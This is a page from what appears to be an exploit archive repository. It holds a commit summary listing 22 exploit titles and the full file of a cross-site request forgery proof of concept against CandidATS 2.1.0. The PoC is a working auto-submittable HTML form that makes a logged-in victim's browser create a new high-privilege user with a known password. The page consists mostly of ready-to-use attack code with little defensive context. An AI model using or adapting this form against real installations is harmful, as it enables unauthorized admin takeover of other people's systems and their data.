cf92ea269e
22 changes to exploits/shellcodes Quick N Easy Web Server 3.3.8 - Denial of Service (PoC) Go SSH servers 0.0.2 - Denial of Service (PoC) Android Binder - Use-After-Free (Metasploit) Diamorphine Rootkit - Signal Privilege Escalation (Metasploit) Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploit) Avaya IP Office Application Server 11.0.0.0 - Reflective Cross-Site Scripting ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure Real Web Pentesting Tutorial Step by Step - [Persian] AMSS++ v 4.31 - 'id' SQL Injection SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure CandidATS 2.1.0 - Cross-Site Request Forgery (Add Admin) AMSS++ 4.7 - Backdoor Admin Account SecuSTATION SC-831 HD Camera - Remote Configuration Disclosure ATutor 2.2.4 - 'id' SQL Injection I6032B-P POE 2.0MP Outdoor Camera - Remote Configuration Disclosure ManageEngine EventLog Analyzer 10.0 - Information Disclosure eLection 2.0 - 'id' SQL Injection DotNetNuke 9.5 - Persistent Cross-Site Scripting DotNetNuke 9.5 - File Upload Restrictions Bypass Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure Cacti 1.2.8 - Remote Code Execution Windows\x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)
29 lines
No EOL
1.4 KiB
Text
29 lines
No EOL
1.4 KiB
Text
# Title: CandidATS 2.1.0 - Cross-Site Request Forgery (Add Admin)
|
|
# Date: 2020-02-21
|
|
# Exploit Author: J3rryBl4nks
|
|
# Vendor Homepage: https://sourceforge.net/u/auieo/profile/
|
|
# Software Link: https://sourceforge.net/projects/candidats/files/#Version 2.1.0
|
|
# Tested on Ubuntu 19/Kali Rolling
|
|
|
|
# The Candid ATS Web application is vulnerable to CSRF to add a new admin user:
|
|
#CSRF Proof of Concept:
|
|
|
|
<html>
|
|
<body>
|
|
<script>history.pushState('', '', '/')</script>
|
|
<form action="http://HOSTNAME/Candid/index.php?m=settings&a=addUser" method="POST">
|
|
<input type="hidden" name="postback" value="postback" />
|
|
<input type="hidden" name="role" value="none" />
|
|
<input type="hidden" name="firstName" value="Test" />
|
|
<input type="hidden" name="lastName" value="User" />
|
|
<input type="hidden" name="email" value="test@test.com" />
|
|
<input type="hidden" name="username" value="Test" />
|
|
<input type="hidden" name="password" value="password" />
|
|
<input type="hidden" name="retypePassword" value="password" />
|
|
<input type="hidden" name="roleid" value="2" />
|
|
<input type="hidden" name="accessLevel" value="500" />
|
|
<input type="hidden" name="submit" value="Add User" />
|
|
<input type="submit" value="Submit request" />
|
|
</form>
|
|
</body>
|
|
</html> |